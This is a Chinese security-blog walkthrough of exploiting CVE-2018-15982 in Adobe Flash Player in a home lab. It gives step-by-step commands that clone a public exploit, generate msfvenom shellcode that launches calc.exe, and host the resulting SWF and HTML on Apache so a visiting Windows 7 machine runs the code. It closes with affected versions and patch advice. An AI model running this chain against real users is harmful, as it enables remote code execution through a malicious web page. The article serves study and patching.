CVE-2018-15982 简单利用

华盟原创文章投稿奖励计划

Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。这些更新解决一个关键的Adobe Flash Player的漏洞和一个重要的Adobe Flash Player的安装程序的漏洞成功利用可能导致当前用户的上下文中的任意代码执行和权限提升。

CVE-2018-15982 简单利用


一、环境准备
攻击机:kali                               IP:192.168.60.129
靶   机:windows 7                       IP:192.168.60.130
漏洞编号“CVE-2018-15982” 

二、实施如下
Kali 配置相关攻击命令:

下载POC
git clone https://github.com/Ridter/CVE-2018-15982_EXP

生成payload文件并放在poc同目录下
msfvenom -p windows/exec cmd=calc.exe -f raw > 86.bin
msfvenom -p windows/x64/exec cmd=calc.exe -f raw > 64.bin

执行poc生成视频和网页文件
python CVE_2018_15982.py -i 86.bin -I 64.bin

开启apache服务并将生成的文件复制到web目录下
service apache2 start
cp index.html /var/www/html/index.html
cp exploit.swf /var/www/html/exploit.swf

win7操作:
访问http://192.168.60.129/index.html,弹出计算机即远程代码执行成功

三、影响版本:
Adobe Flash Player <= 31.0.0.153
Adobe Flash Player Installer<= 31.0.0.108

四、修补建议:
1、Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新,修复了CVE-2018-15982漏洞。
2、不要打开陌生人提供的网页链接和office文档,都可能内嵌恶意flash文件从而执行远程代码。
3、保持系统和杀毒软件处于最新版本。

五、补丁下载
下载地址:
https://www.flash.cn/

www.idc126.com

注:本工具不得用于商业用途,仅做学习交流,一切后果自行承担。

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/246060.html

发表评论